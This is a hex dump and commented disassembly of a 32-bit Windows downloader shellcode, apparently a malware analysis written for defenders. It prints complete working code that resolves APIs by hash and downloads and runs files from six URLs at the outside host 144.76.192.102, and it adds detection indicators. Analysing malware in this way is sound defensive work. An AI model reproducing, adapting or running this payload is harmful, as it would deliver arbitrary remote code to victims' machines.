00000000 e8 00 00 00 00 5b 8d b3 bf 01 00 00 56 8d b3 ab .....[......V...
00000010 01 00 00 56 6a 04 68 88 4e 0d 00 e8 af 00 00 00 ...Vj.h.N.......
00000020 8d 83 d3 01 00 00 50 ff 93 bf 01 00 00 8d b3 cf ......P.........
00000030 01 00 00 56 8d b3 bb 01 00 00 56 6a 01 68 88 90 ...V......Vj.h..
00000040 03 00 e8 88 00 00 00 8d b3 de 01 00 00 89 f7 ac ................
00000050 3c 7c 74 06 84 c0 74 02 eb f5 c6 46 ff 00 80 3f <|t...t....F...?
00000060 00 74 08 57 e8 04 00 00 00 eb e2 c9 c3 55 89 e5 .t.W.........U..
00000070 81 ec 08 02 00 00 60 8d b5 f8 fd ff ff 56 68 60 ......`......Vh`
00000080 02 00 00 ff 93 c3 01 00 00 8d bd fc fe ff ff 57 ...............W
00000090 68 00 00 00 00 68 00 00 00 00 56 ff 93 c7 01 00 h....h....V.....
000000a0 00 68 00 00 00 00 68 00 00 00 00 57 ff 75 08 68 .h....h....W.u.h
000000b0 00 00 00 00 ff 93 cf 01 00 00 85 c0 75 0c 68 05 ............u.h.
000000c0 00 00 00 57 ff 93 cb 01 00 00 61 c9 c2 04 00 55 ...W......a....U
000000d0 89 e5 51 56 57 8b 4d 0c 8b 75 10 8b 7d 14 ff 36 ..QVW.M..u..}..6
000000e0 ff 75 08 e8 13 00 00 00 89 07 83 c7 04 83 c6 04 .u..............
000000f0 e2 ec 5f 5e 59 89 ec 5d c2 10 00 55 89 e5 53 56 .._^Y..]...U..SV
00000100 57 51 64 ff 35 30 00 00 00 58 8b 40 0c 8b 48 0c WQd.50...X.@..H.
00000110 8b 11 8b 41 30 6a 02 8b 7d 08 57 50 e8 5b 00 00 ...A0j..}.WP.[..
00000120 00 85 c0 74 04 89 d1 eb e7 8b 41 18 50 8b 58 3c ...t......A.P.X<
00000130 01 d8 8b 58 78 58 50 01 c3 8b 4b 1c 8b 53 20 8b ...XxXP...K..S .
00000140 5b 24 01 c1 01 c2 01 c3 8b 32 58 50 01 c6 6a 01 [$.......2XP..j.
00000150 ff 75 0c 56 e8 23 00 00 00 85 c0 74 08 83 c2 04 .u.V.#.....t....
00000160 83 c3 02 eb e3 58 31 d2 66 8b 13 c1 e2 02 01 d1 .....X1.f.......
00000170 03 01 59 5f 5e 5b 89 ec 5d c2 08 00 55 89 e5 51 ..Y_^[..]...U..Q
00000180 53 52 31 c9 31 db 31 d2 8b 45 08 8a 10 80 ca 60 SR1.1.1..E.....`
00000190 01 d3 d1 e3 03 45 10 8a 08 84 c9 e0 ee 31 c0 8b .....E.......1..
000001a0 4d 0c 39 cb 74 01 40 5a 5b 59 89 ec 5d c2 0c 00 M.9.t.@Z[Y..]...
000001b0 86 57 0d 00 92 21 0d 00 ce 15 d2 00 ea 6f 00 00 .W...!.......o..
000001c0 c6 30 8e 03 00 00 00 00 00 00 00 00 00 00 00 00 .0..............
000001d0 00 00 00 00 00 00 00 00 75 72 6c 6d 6f 6e 2e 64 ........urlmon.d
000001e0 6c 6c 00 68 74 74 70 3a 2f 2f 31 34 34 2e 37 36 ll.http://144.76
000001f0 2e 31 39 32 2e 31 30 32 2f 3f 39 64 65 32 36 66 .192.102/?9de26f
00000200 66 33 62 36 36 62 61 38 32 62 33 35 65 33 31 62 f3b66ba82b35e31b
00000210 66 34 65 61 39 37 35 64 66 65 7c 68 74 74 70 3a f4ea975dfe|http:
00000220 2f 2f 31 34 34 2e 37 36 2e 31 39 32 2e 31 30 32 //144.76.192.102
00000230 2f 3f 39 30 66 35 62 39 61 31 66 62 63 62 32 65 /?90f5b9a1fbcb2e
00000240 34 61 38 37 39 30 30 31 61 32 38 64 37 39 34 30 4a879001a28d7940
00000250 62 34 7c 68 74 74 70 3a 2f 2f 31 34 34 2e 37 36 b4|http://144.76
00000260 2e 31 39 32 2e 31 30 32 2f 3f 38 65 65 63 36 63 .192.102/?8eec6c
00000270 35 39 36 62 62 33 65 36 38 34 30 39 32 62 39 65 596bb3e684092b9e
00000280 61 38 39 37 30 64 37 65 61 65 7c 68 74 74 70 3a a8970d7eae|http:
00000290 2f 2f 31 34 34 2e 37 36 2e 31 39 32 2e 31 30 32 //144.76.192.102
000002a0 2f 3f 33 35 35 32 33 62 62 38 31 65 63 61 36 30 /?35523bb81eca60
000002b0 34 66 39 65 62 64 31 37 34 38 38 37 39 66 33 66 4f9ebd1748879f3f
000002c0 63 31 7c 68 74 74 70 3a 2f 2f 31 34 34 2e 37 36 c1|http://144.76
000002d0 2e 31 39 32 2e 31 30 32 2f 3f 62 32 38 62 30 36 .192.102/?b28b06
000002e0 66 30 31 65 32 31 39 64 35 38 65 66 62 61 39 66 f01e219d58efba9f
000002f0 65 30 64 31 66 65 31 62 62 33 7c 68 74 74 70 3a e0d1fe1bb3|http:
00000300 2f 2f 31 34 34 2e 37 36 2e 31 39 32 2e 31 30 32 //144.76.192.102
00000310 2f 3f 35 32 64 34 65 36 34 34 65 39 63 64 61 35 /?52d4e644e9cda5
00000320 31 38 38 32 34 32 39 33 65 37 61 34 63 64 62 37 18824293e7a4cdb7
00000330 61 31 00 a1.
Disassembly of the code portion:
; ---------------------------------------------------------------------------
; Entry stub, offsets 0x00-0x6C (32-bit x86, position-independent).
; Summary for analysts: resolves five Windows APIs by name hash, loads
; urlmon.dll, then splits the '|'-separated URL list embedded at blob offset
; 0x1E3 and hands each URL to the routine at 0x6D (download to a temp file,
; then run it).
;
; All [ebx+N] operands are relative to offset 0x05, so blob offset = N + 5.
; Hash values below were checked against the hash routine at 0x17C (its bytes
; are in the hex dump; it is not part of this disassembly).
;
; Indicators visible in the dump: the string "urlmon.dll" and six URLs of the
; form http://144.76.192.102/?<32 hex chars>.
; Behaviour worth alerting on: a process that loads urlmon.dll, writes a new
; temp file and immediately launches it; code that writes into its own
; executable region (the NUL patch at 0x5A and the API table at 0x1C4-0x1D7
; both live inside the blob, so the blob must be writable and executable).
; ---------------------------------------------------------------------------
; call to the next instruction + pop: ebx = run-time address of offset 0x05.
00000000 E800000000 call dword 0x5
00000005 5B pop ebx
; First resolve call: 0xCF(module hash 0xd4e88, count 4, hash array at blob
; 0x1B0, output table at blob 0x1C4). 0xd4e88 is the hash of "kernel32.dll";
; the four hashes at 0x1B0 match LoadLibraryA, GetTempPathA,
; GetTempFileNameA and WinExec, in that order.
00000006 8DB3BF010000 lea esi,[ebx+0x1bf]
0000000C 56 push esi
0000000D 8DB3AB010000 lea esi,[ebx+0x1ab]
00000013 56 push esi
00000014 6A04 push byte +0x4
00000016 68884E0D00 push dword 0xd4e88
0000001B E8AF000000 call dword 0xcf
; Call table slot 0 (LoadLibraryA) with the string at blob 0x1D8, "urlmon.dll".
; The return value is not checked.
00000020 8D83D3010000 lea eax,[ebx+0x1d3]
00000026 50 push eax
00000027 FF93BF010000 call dword [ebx+0x1bf]
; Second resolve call: 0xCF(module hash 0x39088 = "urlmon.dll", count 1, hash
; array at blob 0x1C0, output at blob 0x1D4). The single hash 0x038e30c6
; matches URLDownloadToFileA.
0000002D 8DB3CF010000 lea esi,[ebx+0x1cf]
00000033 56 push esi
00000034 8DB3BB010000 lea esi,[ebx+0x1bb]
0000003A 56 push esi
0000003B 6A01 push byte +0x1
0000003D 6888900300 push dword 0x39088
00000042 E888000000 call dword 0xcf
; esi = blob 0x1E3, start of the URL list.
00000047 8DB3DE010000 lea esi,[ebx+0x1de]
; Outer loop: edi marks the start of the current token.
0000004D 89F7 mov edi,esi
; Inner loop: scan forward until '|' (0x7c) or NUL.
0000004F AC lodsb
00000050 3C7C cmp al,0x7c
00000052 7406 jz 0x5a
00000054 84C0 test al,al
00000056 7402 jz 0x5a
00000058 EBF5 jmp short 0x4f
; Overwrite the delimiter with NUL in place so the token is a C string.
0000005A C646FF00 mov byte [esi-0x1],0x0
; An empty token ends the loop. After the sixth URL the next token starts at
; blob 0x333, one byte past the end of the hex dump shown, so a clean exit
; depends on whatever byte follows the blob in memory being zero.
0000005E 803F00 cmp byte [edi],0x0
00000061 7408 jz 0x6b
; Pass the URL pointer to the download routine (one stack argument).
00000063 57 push edi
00000064 E804000000 call dword 0x6d
00000069 EBE2 jmp short 0x4d
; No prologue exists in this stub, so `leave` unwinds whatever frame ebp held
; on entry; presumably set up by the code that transferred control here.
0000006B C9 leave
0000006C C3 ret
; ---------------------------------------------------------------------------
; Routine 0x6D-0xCC: fetch one URL to a temp file and run it.
; In:    [ebp+0x8] = pointer to a NUL-terminated URL (callee pops it, ret 0x4)
;        ebx       = blob base + 5, inherited from the entry stub (not reloaded)
; Out:   nothing; all general registers are restored by pushad/popad
; Stack: 0x208 bytes of locals; esi = ebp-0x208 and edi = ebp-0x104 are two
;        0x104-byte buffers.
; The API names below come from the hashes stored at blob 0x1B0-0x1C3, which
; match these names under the hash routine at 0x17C (bytes in the hex dump).
; Detection view: an HTTP download written to a freshly named temp file that
; is then started by the same process.
; ---------------------------------------------------------------------------
0000006D 55 push ebp
0000006E 89E5 mov ebp,esp
00000070 81EC08020000 sub esp,0x208
00000076 60 pushad
; Table slot 1 (GetTempPathA) called as (0x260, esi). The length passed,
; 0x260, is larger than the whole 0x208-byte frame; possibly decimal 260 was
; intended. Return value is not checked.
00000077 8DB5F8FDFFFF lea esi,[ebp-0x208]
0000007D 56 push esi
0000007E 6860020000 push dword 0x260
00000083 FF93C3010000 call dword [ebx+0x1c3]
; Table slot 2 (GetTempFileNameA) called as (esi, 0, 0, edi): the path in
; esi is the input, edi receives the generated file name.
00000089 8DBDFCFEFFFF lea edi,[ebp-0x104]
0000008F 57 push edi
00000090 6800000000 push dword 0x0
00000095 6800000000 push dword 0x0
0000009A 56 push esi
0000009B FF93C7010000 call dword [ebx+0x1c7]
; Slot at blob 0x1D4 (URLDownloadToFileA) called as (0, URL, edi, 0, 0):
; the URL argument is saved to the temp file named in edi.
000000A1 6800000000 push dword 0x0
000000A6 6800000000 push dword 0x0
000000AB 57 push edi
000000AC FF7508 push dword [ebp+0x8]
000000AF 6800000000 push dword 0x0
000000B4 FF93CF010000 call dword [ebx+0x1cf]
; A non-zero result skips execution; only a zero (success) result continues.
000000BA 85C0 test eax,eax
000000BC 750C jnz 0xca
; Table slot 3 (WinExec) called as (edi, 5): runs the downloaded file.
000000BE 6805000000 push dword 0x5
000000C3 57 push edi
000000C4 FF93CB010000 call dword [ebx+0x1cb]
; The temp file is not deleted on either path, so it remains as an artifact.
000000CA 61 popad
000000CB C9 leave
000000CC C20400 ret 0x4
; ---------------------------------------------------------------------------
; Routine 0xCF-0xF8: resolve an array of function hashes from one module.
; In (stack, callee pops 0x10 bytes):
;        [ebp+0x08] = module-name hash
;        [ebp+0x0c] = number of entries
;        [ebp+0x10] = pointer to array of dword function hashes
;        [ebp+0x14] = pointer to output array of dword addresses
; Out:   output array filled with the values returned by 0xFB
; Saves: ecx, esi, edi. eax is left holding the last value returned by 0xFB.
; The output array passed by both visible callers lies inside the blob itself,
; so this routine writes into the code's own memory region.
; ---------------------------------------------------------------------------
000000CF 55 push ebp
000000D0 89E5 mov ebp,esp
000000D2 51 push ecx
000000D3 56 push esi
000000D4 57 push edi
; ecx = count, esi = hash cursor, edi = output cursor.
000000D5 8B4D0C mov ecx,[ebp+0xc]
000000D8 8B7510 mov esi,[ebp+0x10]
000000DB 8B7D14 mov edi,[ebp+0x14]
; Per entry: 0xFB(module hash, function hash) -> eax, stored to the output.
; 0xFB pushes and pops ecx itself, so the loop counter survives the call.
000000DE FF36 push dword [esi]
000000E0 FF7508 push dword [ebp+0x8]
000000E3 E813000000 call dword 0xfb
000000E8 8907 mov [edi],eax
000000EA 83C704 add edi,byte +0x4
000000ED 83C604 add esi,byte +0x4
; The body runs once before the count is tested, so a count of 0 is not
; handled; the visible callers pass 4 and 1.
000000F0 E2EC loop 0xde
000000F2 5F pop edi
000000F3 5E pop esi
000000F4 59 pop ecx
000000F5 89EC mov esp,ebp
000000F7 5D pop ebp
000000F8 C21000 ret 0x10
; ---------------------------------------------------------------------------
; Routine 0xFB-0x179: find one exported function by module hash + name hash,
; without using the import table.
; In (stack, callee pops 8 bytes):
;        [ebp+0x08] = module-name hash
;        [ebp+0x0c] = function-name hash
; Out:   eax = address of the matching export
; Saves: ebx, esi, edi, ecx. edx is overwritten.
; Uses the comparison routine at 0x17C, which is not in this disassembly (its
; bytes are in the hex dump). From the call sites it takes (string pointer,
; expected hash, character stride) and returns zero on a match; the callers
; rely on it preserving ecx, edx and ebx.
; The structure offsets below match the 32-bit Windows PEB / loader-data / PE
; export-directory layouts.
; Analyst note: no imports are needed, so static import analysis of a host
; file will not show the APIs this code ends up calling.
; ---------------------------------------------------------------------------
000000FB 55 push ebp
000000FC 89E5 mov ebp,esp
000000FE 53 push ebx
000000FF 56 push esi
00000100 57 push edi
00000101 51 push ecx
; eax = PEB (fs:[0x30]); [eax+0xc] = loader data; [..+0xc] = first entry of
; the load-order module list.
00000102 64FF3530000000 push dword [dword fs:0x30]
00000109 58 pop eax
0000010A 8B400C mov eax,[eax+0xc]
0000010D 8B480C mov ecx,[eax+0xc]
; Module loop: edx = next entry, eax = pointer at entry+0x30 (base DLL name
; buffer, UTF-16, hence stride 2). Compare its hash with the wanted one.
00000110 8B11 mov edx,[ecx]
00000112 8B4130 mov eax,[ecx+0x30]
00000115 6A02 push byte +0x2
00000117 8B7D08 mov edi,[ebp+0x8]
0000011A 57 push edi
0000011B 50 push eax
0000011C E85B000000 call dword 0x17c
00000121 85C0 test eax,eax
00000123 7404 jz 0x129
; No match: advance. There is no end-of-list check, so a module that is not
; loaded is never reported as "not found"; the walk simply continues.
00000125 89D1 mov ecx,edx
00000127 EBE7 jmp short 0x110
; Match: eax = module base (entry+0x18), kept on the stack for later reloads.
00000129 8B4118 mov eax,[ecx+0x18]
0000012C 50 push eax
; base+0x3c = offset of the PE header; header+0x78 = export directory RVA.
0000012D 8B583C mov ebx,[eax+0x3c]
00000130 01D8 add eax,ebx
00000132 8B5878 mov ebx,[eax+0x78]
00000135 58 pop eax
00000136 50 push eax
00000137 01C3 add ebx,eax
; ecx = function-address table, edx = name-pointer table, ebx = ordinal
; table (export directory +0x1c / +0x20 / +0x24), each rebased to an address.
00000139 8B4B1C mov ecx,[ebx+0x1c]
0000013C 8B5320 mov edx,[ebx+0x20]
0000013F 8B5B24 mov ebx,[ebx+0x24]
00000142 01C1 add ecx,eax
00000144 01C2 add edx,eax
00000146 01C3 add ebx,eax
; Name loop: esi = address of the current export name (ASCII, stride 1).
; eax is reloaded with the module base each pass because the call below
; returns its result in eax.
00000148 8B32 mov esi,[edx]
0000014A 58 pop eax
0000014B 50 push eax
0000014C 01C6 add esi,eax
0000014E 6A01 push byte +0x1
00000150 FF750C push dword [ebp+0xc]
00000153 56 push esi
00000154 E823000000 call dword 0x17c
00000159 85C0 test eax,eax
0000015B 7408 jz 0x165
; No match: step the name pointer (4 bytes) and the ordinal (2 bytes) in
; lockstep. The walk is not bounded by the export directory's name count.
0000015D 83C204 add edx,byte +0x4
00000160 83C302 add ebx,byte +0x2
00000163 EBE3 jmp short 0x148
; Match: eax = base + function_table[ordinal], i.e. the export's address.
00000165 58 pop eax
00000166 31D2 xor edx,edx
00000168 668B13 mov dx,[ebx]
0000016B C1E202 shl edx,0x2
0000016E 01D1 add ecx,edx
00000170 0301 add eax,[ecx]
00000172 59 pop ecx
00000173 5F pop edi
00000174 5E pop esi
00000175 5B pop ebx
00000176 89EC mov esp,ebp
00000178 5D pop ebp
00000179 C20800 ret 0x8